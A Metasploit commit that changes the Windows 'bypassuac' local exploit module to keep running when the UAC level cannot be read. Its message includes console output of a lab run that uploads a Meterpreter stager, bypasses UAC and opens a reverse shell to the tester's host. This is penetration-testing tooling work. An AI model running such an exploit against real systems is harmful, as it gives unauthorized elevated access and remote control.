Fix UAC is not enabled, no reason to run module when UAC is enabled and vulnerable

The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') breaks UAC on Windows 7 and Windows 8 and shows that UAC is not enabled when it is: Here is prior to the change on a fully patched Windows 8 machine: msf exploit(bypassuac) > exploit [*] Started reverse handler on 172.16.21.156:4444 [*] UAC is Enabled, checking level... [-] UAC is not enabled, no reason to run module [-] Run exploit/windows/local/ask to elevate msf exploit(bypassuac) > Here's the module when running with the most recent changes that are being proposed: [*] Started reverse handler on 172.16.21.156:4444 [*] UAC is Enabled, checking level... [!] Could not determine UAC level - attempting anyways... [*] Checking admin status... [+] Part of Administrators group! Continuing... [*] Uploading the bypass UAC executable to the filesystem... [*] Meterpreter stager executable 73802 bytes long being uploaded.. [*] Uploaded the agent to the filesystem.... [*] Sending stage (770048 bytes) to 172.16.21.128 [*] Meterpreter session 6 opened (172.16.21.156:4444 -> 172.16.21.128:49394) at 2013-10-05 15:49:23 -0400 meterpreter > With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.
2013-10-05 15:56:55 -04:00 · 2013-10-05 15:56:55 -04:00 · 0799766faa
parent 875e086d94
commit 0799766faa
1 changed files with 1 additions and 3 deletions
--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@ -81,9 +81,7 @@ class Metasploit3 < Msf::Exploit::Local
      print_good "UAC is set to Default"
      print_good "BypassUAC can bypass this setting, continuing..."
    when 0
-      print_error "UAC is not enabled, no reason to run module"
-      print_error "Run exploit/windows/local/ask to elevate"
-      return
+      print_warning "Could not determine UAC level - attempting anyways..."
    end

    # Check if you are an admin